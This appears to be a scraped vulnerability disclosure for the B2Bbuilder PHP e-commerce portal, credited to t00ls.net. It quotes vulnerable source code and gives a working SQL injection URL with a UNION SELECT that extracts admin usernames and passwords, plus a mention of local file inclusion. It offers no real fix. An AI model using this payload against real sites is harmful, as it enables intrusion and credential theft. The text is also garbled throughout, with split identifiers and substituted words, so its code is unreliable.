B2Bbuilder php SQL inj

Product Introduction:

B2Bbuilder provides you with an efficient, stable, and powerful B2B e-commerce industry portal solution.

Defects:

Wap/index. php
 
If (! Empty ($ _ GET ["action"])
$ Action = $ _ GET ["action"];
Else
$ Action = "home ";
// $ Action = empty ($ action )? "Home": $ _ GET ["action"];
// ======================================
If (in_array ($ action, array ('home', 'offer _ cat', 'offer _ list', 'offer _ detail', 'product _ cat ', 'product _ list', 'product _ detail', 'news _ cat', 'news _ list', 'news _ detail', 'distribute ate _ cat ', 'initialize ate _ list', 'initialize ate _ detail', 'search', 'initialize ate _ moredetail ', 'product _ showimg ')))
{
Require 'inc/'. $ action.'. php ';
} News_cat.php File
 
If (! Empty ($ _ GET ['nid'])
{
$ Nid = $ _ GET ['nid'];
$ SQL = "select * from". NEWSCAT. "where pid = $ nid ";
$ Db-> query ($ SQL );
$ Sre = $ db-> getRows ();
If (count ($ sre)> 0)
{
Foreach ($ sre as $ v)
{
Echo "[information] <a href = '? Action = news_list & newsid = ". $ v ['catid']." '> ". $ v ['cat']." </a> ";
}
Echo "<a href = '? Action = news_cat '> <I> return </I> </a> ";
// Echo "<anchor> back <prev/> </anchor> ";
}
Else
{
Header ("Location :./? Action = news_list & nid = ". $ nid );
Exit ();
}
} You can obtain the database prefix with any wrong statement.
 
Test:
 
Http://www.bkjia.com/B2B/wap/index. php? Action = news_cat & nid = 17% 20and % 201 = 2% 20 uNion % 20 select % 201, concat (0x7E217E21, user, 0x3A, password, 0x7E217E21), 3,4, 5, 6, 7,8% 20 FROM % 20
 
Database prefix _ admin
 
Local inclusion. Limited magic_quotes_gpc
 
Module/news/admin/newscat. php
 
Fix:
See the above analysis
Author: t00ls.net